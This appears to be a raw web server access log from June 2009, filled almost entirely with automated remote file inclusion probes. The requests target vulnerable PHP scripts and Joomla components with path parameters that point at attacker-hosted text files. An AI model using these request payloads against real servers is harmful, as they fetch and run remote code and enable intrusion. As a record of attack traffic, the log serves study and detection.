213.189.9.11 - - [04/Jun/2009:06:50:31 -0500] "GET /logs//citywriter/head.php?path=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
168.143.19.89 - - [04/Jun/2009:06:50:50 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:06:50:50 -0500] "GET /logs/access_log.1234137600/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 346 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:06:50:50 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 324 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:06:50:58 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:06:50:58 -0500] "GET /logs/access_log.1236038400/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 346 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:06:50:58 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 324 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:06:51:04 -0500] "GET /logs/access_log.1234137600/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 346 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:06:51:11 -0500] "GET /logs/access_log.1236643200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 346 "-""Mozilla/5.0"
218.246.20.221 - - [04/Jun/2009:06:51:20 -0500] "GET /logs/access_log.1240358400//administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 381 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:06:51:22 -0500] "GET /logs/access_log.1233705600/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 346 "-""Mozilla/5.0"
213.189.9.11 - - [04/Jun/2009:06:51:42 -0500] "GET /logs//citywriter/head.php?path=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
213.189.9.11 - - [04/Jun/2009:06:51:44 -0500] "GET //citywriter/head.php?path=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 303 "-""libwww-perl/5.811"
85.214.37.11 - - [04/Jun/2009:06:51:50 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.angelcitytrading.com/css/test.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
85.214.37.11 - - [04/Jun/2009:06:51:50 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.angelcitytrading.com/css/test.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
213.33.76.85 - - [04/Jun/2009:06:54:19 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
213.33.76.85 - - [04/Jun/2009:06:54:20 -0500] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
213.33.76.85 - - [04/Jun/2009:06:54:20 -0500] "GET /logs/access_log.1239148800//plugins/safehtml/safehtml.php?dir[plugins]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
213.33.76.85 - - [04/Jun/2009:06:54:20 -0500] "GET /logs/access_log.1237766400//plugins/safehtml/safehtml.php?dir[plugins]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
217.125.38.117 - - [04/Jun/2009:06:54:44 -0500] "GET /logs//citywriter/head.php?path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
217.125.38.117 - - [04/Jun/2009:06:54:44 -0500] "GET /logs/access_log.1240444800//citywriter/head.php?path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
217.125.38.117 - - [04/Jun/2009:06:54:44 -0500] "GET /logs/access_log.1240531200//citywriter/head.php?path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
217.125.38.117 - - [04/Jun/2009:06:54:45 -0500] "GET //citywriter/head.php?path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
217.125.38.117 - - [04/Jun/2009:06:55:46 -0500] "GET /logs/access_log.1241654400//citywriter/head.php?path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:07:03:42 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:07:03:42 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:07:03:44 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:07:03:44 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:07:05:29 -0500] "GET /logs//BaseAdmin.class.php?_CONF[path]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
62.140.23.192 - - [04/Jun/2009:07:05:30 -0500] "GET //BaseAdmin.class.php?_CONF[path]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.803"
209.51.133.202 - - [04/Jun/2009:07:06:55 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:07:06:55 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:07:06:55 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:07:06:56 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
203.151.233.106 - - [04/Jun/2009:07:08:48 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
203.151.233.106 - - [04/Jun/2009:07:08:55 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
203.151.233.106 - - [04/Jun/2009:07:08:55 -0500] "GET /logs/access_log.1239667200/e404.php?DOCUMENT_ROOT=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
203.151.233.106 - - [04/Jun/2009:07:08:55 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:07:09:31 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:07:09:31 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:07:09:31 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:07:09:41 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:07:09:41 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:07:09:41 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
207.210.126.218 - - [04/Jun/2009:07:10:38 -0500] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.latinintel-tc.com/pages/fx29id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.210.126.218 - - [04/Jun/2009:07:10:38 -0500] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.latinintel-tc.com/pages/fx29id.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
207.210.126.218 - - [04/Jun/2009:07:10:38 -0500] "GET /logs/access_log.1240012800/modules/agendax/addevent.inc.php?agendax_path=http://www.latinintel-tc.com/pages/fx29id.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
207.210.126.218 - - [04/Jun/2009:07:10:58 -0500] "GET /logs/access_log.1238112000/modules/agendax/addevent.inc.php?agendax_path=http://www.latinintel-tc.com/pages/fx29id.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:07:13:44 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:07:13:47 -0500] "GET /logs/access_log.1240444800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:07:13:49 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:07:13:52 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.49.99.7 - - [04/Jun/2009:07:17:47 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
211.49.99.7 - - [04/Jun/2009:07:17:47 -0500] "GET /logs/access_log.1239667200/e404.php?DOCUMENT_ROOT=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
211.49.99.7 - - [04/Jun/2009:07:17:47 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
211.49.99.7 - - [04/Jun/2009:07:17:50 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
207.210.126.218 - - [04/Jun/2009:07:20:02 -0500] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.latinintel-tc.com/pages/fx29id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.210.126.218 - - [04/Jun/2009:07:20:02 -0500] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.latinintel-tc.com/pages/fx29id.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
207.210.126.218 - - [04/Jun/2009:07:20:02 -0500] "GET /logs/access_log.1240012800/modules/agendax/addevent.inc.php?agendax_path=http://www.latinintel-tc.com/pages/fx29id.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
222.231.1.113 - - [04/Jun/2009:07:20:18 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
222.231.1.113 - - [04/Jun/2009:07:20:18 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
222.231.1.113 - - [04/Jun/2009:07:20:18 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
207.210.126.218 - - [04/Jun/2009:07:20:26 -0500] "GET /logs/access_log.1238112000/modules/agendax/addevent.inc.php?agendax_path=http://www.latinintel-tc.com/pages/fx29id.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:07:21:40 -0500] "GET /logs/access_log.1237680000//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:07:21:40 -0500] "GET //?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:07:21:42 -0500] "GET /logs//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 200 191989 "-""Mozilla/5.0"
222.231.1.113 - - [04/Jun/2009:07:22:00 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
222.231.1.113 - - [04/Jun/2009:07:22:00 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
222.231.1.113 - - [04/Jun/2009:07:22:00 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:07:22:47 -0500] "GET //?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:07:22:47 -0500] "GET /logs/access_log.1237680000//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:07:22:49 -0500] "GET /logs//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 200 191989 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:07:25:24 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:07:25:24 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:07:25:24 -0500] "GET /logs/access_log.1242000000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:07:25:25 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:07:25:25 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:07:25:25 -0500] "GET /logs/access_log.1242000000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:07:25:35 -0500] "GET /logs/access_log.1240358400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:07:25:48 -0500] "GET /logs/access_log.1240358400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
65.55.106.211 - - [04/Jun/2009:07:26:05 -0500] "GET /logs/access_log.1125187200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.0.73.2 - - [04/Jun/2009:07:26:18 -0500] "GET /logs/access_log.1240358400/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
124.0.73.2 - - [04/Jun/2009:07:26:28 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
124.0.73.2 - - [04/Jun/2009:07:26:33 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
210.109.101.217 - - [04/Jun/2009:07:28:37 -0500] "GET /PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
210.109.101.217 - - [04/Jun/2009:07:28:37 -0500] "GET /logs/access_log.1241049600/PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
210.109.101.217 - - [04/Jun/2009:07:28:38 -0500] "GET /logs/PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
210.109.101.217 - - [04/Jun/2009:07:28:38 -0500] "GET /logs/access_log.1238112000/PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
218.249.36.194 - - [04/Jun/2009:07:28:40 -0500] "GET /PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
218.249.36.194 - - [04/Jun/2009:07:28:40 -0500] "GET /logs/PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
218.249.36.194 - - [04/Jun/2009:07:28:40 -0500] "GET /logs/access_log.1238112000/PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
218.249.36.194 - - [04/Jun/2009:07:28:40 -0500] "GET /logs/access_log.1241049600/PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
190.144.44.36 - - [04/Jun/2009:07:28:41 -0500] "GET /logs/PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
190.144.44.36 - - [04/Jun/2009:07:28:41 -0500] "GET /PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
190.144.44.36 - - [04/Jun/2009:07:28:50 -0500] "GET /logs/access_log.1238112000/PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
222.239.76.25 - - [04/Jun/2009:07:28:53 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.wolom.net/WebCalendar//ws/CVS/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
222.239.76.25 - - [04/Jun/2009:07:28:53 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.wolom.net/WebCalendar//ws/CVS/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
222.239.76.25 - - [04/Jun/2009:07:28:53 -0500] "GET /logs/access_log.1230249600//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.wolom.net/WebCalendar//ws/CVS/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
190.144.44.36 - - [04/Jun/2009:07:28:54 -0500] "GET /PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
190.144.44.36 - - [04/Jun/2009:07:28:54 -0500] "GET /logs/PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
190.144.44.36 - - [04/Jun/2009:07:28:54 -0500] "GET /logs/access_log.1241049600/PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
190.144.44.36 - - [04/Jun/2009:07:28:54 -0500] "GET /logs/access_log.1241049600/PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
190.144.44.36 - - [04/Jun/2009:07:28:54 -0500] "GET /logs/access_log.1238112000/PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:07:28:58 -0500] "GET /logs/PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:07:28:58 -0500] "GET /PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:07:29:12 -0500] "GET /PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:07:29:12 -0500] "GET /logs/PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:07:29:19 -0500] "GET /logs/PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:07:29:22 -0500] "GET /PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:07:29:26 -0500] "GET /logs/access_log.1241049600/PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:07:29:26 -0500] "GET /logs/access_log.1238112000/PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:07:29:29 -0500] "GET /logs/access_log.1241049600/PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:07:29:29 -0500] "GET /logs/access_log.1238112000/PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:07:29:41 -0500] "GET /logs/access_log.1238112000/PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:07:29:44 -0500] "GET /logs/access_log.1241049600/PHPNews/auth.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
125.206.170.126 - - [04/Jun/2009:07:31:33 -0500] "GET //?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 200 3233 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:07:31:59 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:07:31:59 -0500] "GET /logs/access_log.1240531200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:07:31:59 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
125.206.170.126 - - [04/Jun/2009:07:32:02 -0500] "GET /logs/access_log.1237680000//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 299 "-""Mozilla/5.0"
125.206.170.126 - - [04/Jun/2009:07:32:03 -0500] "GET /logs//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 200 191655 "-""Mozilla/5.0"
88.191.103.144 - - [04/Jun/2009:07:33:31 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.191.103.144 - - [04/Jun/2009:07:33:31 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
88.191.103.144 - - [04/Jun/2009:07:33:35 -0500] "GET /logs/access_log.1240531200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:07:34:41 -0500] "GET /logs/access_log.1232841600//login.php?dir=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:07:34:41 -0500] "GET /logs//login.php?dir=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:07:34:41 -0500] "GET //login.php?dir=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
89.107.224.140 - - [04/Jun/2009:07:35:03 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
